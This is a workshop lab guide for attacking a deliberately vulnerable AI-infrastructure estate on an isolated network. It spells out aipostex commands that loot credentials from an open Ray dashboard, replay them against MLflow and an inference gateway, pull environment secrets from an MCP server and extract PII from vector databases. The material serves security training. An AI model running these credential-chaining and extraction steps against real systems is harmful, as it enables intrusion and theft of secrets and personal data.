Skip to content

Start Here — Red Team Village Hands-On

This lab is ACME's shadow-AI estate — real AI infrastructure deployed the way teams actually leave it: an unauthenticated Ray cluster, an MLflow tracking server behind an auth gate, a LiteLLM proxy, vector databases, notebooks, a real MCP server, and a HuggingFace-style inference gateway.

The story you'll live: one open Ray dashboard on the ML-platform team's box leaks a credential for the data-science team's MLflow, which leaks an inference token for the app team's serving gateway — ending in real model generation. One foothold, three teams. And the same estate holds ACME's acme-fraud-scorer model, customer PII in the RAG vector stores, and a Snowflake warehouse credential sitting in an MLflow run parameter — all reachable once you're inside.

Your mission has three moves: map the estate → complete one real credential chain → score your coverage.


1. You are here

You have one foothold: the attack box. Everything else lives on the isolated lab bridge behind it — a flat estate where every service is reachable once you're on the box (the shadow-AI premise).

your laptop  ──VPN──▶  attack box  ──▶  ailab-dev / ailab-ml / ailab-ds / ailab-app

What you're scoring against

5 VMs · 29 service endpoints · 170 planted sensitive findings. The benchmark measures how much of the planted estate your scan surfaces — and grades every finding by proof strength (reachable → credential-gated read → state-change / real inference). It's a coverage report card, not CTF points.


2. Five-minute quickstart

# On the attack box (your VPN config + attack-box address are handed out at the table)
./aipostex version                # confirm the binary is here
mkdir -p ~/lab-results            # everything you collect lands here for scoring
./aipostex discover network --target 172.16.50.10 --ports 3000 --mode detect   # smoke test

New here? Learning Path · VM map · Remote access


3. The guided chain

Run the ladder top-to-bottom, writing each result into ~/lab-results. Every hop loots the credential the next hop needs — the output of one command is the input to the next.

# 1) Map the estate
./aipostex discover network --target 172.16.50.10,172.16.50.20,172.16.50.30,172.16.50.40 \
    --format json -o ~/lab-results/discover.json

# 2) Ray dashboard (unauthenticated) — leaks the MLflow gateway credential in a job's runtime_env
./aipostex ray --target http://172.16.50.20:8265 jobs \
    --format json -o ~/lab-results/ray.json

# 3) MLflow auth gateway — authenticate with the Ray-looted Basic credential; run params leak an HF token
./aipostex mlflow --target http://172.16.50.30:5000 \
    --header "Authorization: Basic <ray-looted-basic>" runs --limit 20 \
    --format json -o ~/lab-results/mlflow.json

# 4) HF TGI gateway — replay the looted HF token for REAL model inference
./aipostex huggingface --target http://172.16.50.40:8180 \
    --header "Authorization: Bearer <mlflow-looted-hf-token>" \
    generate --prompt "incident response playbook" --force-exploit \
    --format json -o ~/lab-results/hf.json

The placeholders (<ray-looted-basic>, <mlflow-looted-hf-token>) are credentials you loot from the previous step's output — that hand-off is the whole point. The MLflow hop at ailab-ds:5000 is credential-gated (you need the Ray loot); the separate MLflow backend at ailab-ml:5000 is directly exposed — both are realistic surfaces in an open estate.

Want it narrated step by step? Demo Walkthrough · Scenario 08 (the chain).


4. Score your assessment

python3 ~/lab/scoring/score.py ~/lab-results --strict

You get a report card: coverage of the 170 planted findings, a per-category breakdown, and a proof-strength profile (how much you merely reached vs. read-with-credential vs. actually executed). It does not spoil the answers — it grades what your own scan surfaced. How the scoring + proof classification work: Scoring System · RRR Honesty Matrix.


5. If you finish early

The chain is one path through the estate. There's a lot more planted — point the tool at it:

# Real MCP server (dev workstation) — discovers /mcp, lands command-exec + file-read + env leak
./aipostex mcp --target http://172.16.50.10:3000 enum
./aipostex mcp --target http://172.16.50.10:3000 env-extract

# Vector DBs — extract planted PII from RAG stores
./aipostex vectordb --type chromadb --target 172.16.50.20:8000 search-sensitive --limit 50

# A2A agents, model registry tampering, W&B, Kubeflow
./aipostex a2a --target http://172.16.50.40:8100 enum
./aipostex mlflow --target http://172.16.50.20:5000 registry
./aipostex wandb --target http://172.16.50.20:8444 enum

Full menu: Attack Scenarios (12 of them).


6. Take it home — and build the corpus

Everything is open-source. Run the whole estate on your own Proxmox/cloud, or point the tool at your own AI stack.

The binary is just the runner. The durable, shared artifact is the AI-infra detection corpus — the after-action loop is: observe a weird AI service → write a template → lint → run it → PR it.

# run your own templates alongside the built-in set
aipostex scan targets --target http://host:port --templates-dir ./aipostex-templates
  1. Find a weird AI service in the wild.
  2. Write a YAML template for it.
  3. Lint it: aipostex templates lint --templates-dir .
  4. Test it against this lab or a real instance.
  5. Open a PR — the strongest community templates get promoted into the core.

  6. Community templatesgithub.com/professor-moody/aipostex-templates · authoring guide · wanted templates

Community is the incubator, not the trusted core

The binary ships a curated, release-tested template set. Community templates are a fast-moving, PR-driven, linted lane; the strongest ones get promoted into the core after review and lab proof.